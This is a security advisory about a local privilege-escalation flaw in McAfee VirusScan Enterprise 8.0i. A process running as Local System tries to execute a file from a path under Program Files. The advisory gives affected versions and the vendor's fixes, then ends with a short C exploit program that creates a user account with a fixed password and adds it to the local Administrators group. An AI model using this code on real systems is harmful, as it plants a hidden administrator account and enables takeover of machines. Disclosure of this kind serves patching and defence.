|
|
|
|
| |
McAfee VirusScan Enterprise - "Enterprise antivirus and antispyware solution. McAfee VirusScan detects, blocks, and removes viruses and spyware, that may result in the loss of your irreplaceable documents, such as digital photos, family movies, and financial spreadsheets, identity theft and slower PC performance."
A security vulnerability in McAfee's VirusScan Enterprise allows local attackers to escalate their privileges. |
| |
Credit:
The information has been provided by Reed Arvin.
The original article can be found at: http://reedarvin.thearvins.com/20051222-01.html
|
| |
Vulnerable Systems:
* McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)
Immune Systems:
* McAfee VirusScan Enterprise 8.0i (patch 12)
By default the naPrdMgr.exe process runs under the context of the Local System account. Every so often it will run through a process where it does the following:
- Attempts to run \Program Files\Network Associates\VirusScan\EntVUtil.EXE
- Reads C:\Program Files\Common Files\Network Associates\Engine\SCAN.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\NAMES.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\CLEAN.DAT
Vendor Status:
The vendor has released knowledge base article KB45256 to address the issue.
Solutions:
Solution one from the vendor:
"This issue is resolved in Patch 12."
Solution two from the vendor:
"The VirusScan Enterprise plugin VSPLUGIN.DLL has been updated to resolve the potential exploit. The new plugin is available as a HotFix from McAfee Tier III Technical Support."
Exploit:
// ===== Start Program.c ======
#include <windows.h>
#include <stdio.h>
INT main( VOID )
{
CHAR szWinDir[ _MAX_PATH ];
CHAR szCmdLine[ _MAX_PATH ];
GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );
printf( "Creating user \"Program\" with password \"Pr0gr@m$$\"...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe user Program Pr0gr@m$$ /add", szWinDir );
system( szCmdLine );
printf( "Adding user \"Program\" to the local Administrators group...\n" );
wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators Program /add", szWinDir );
system( szCmdLine );
return 0;
}
// ===== End Program.c ======
|
|
|
|
|
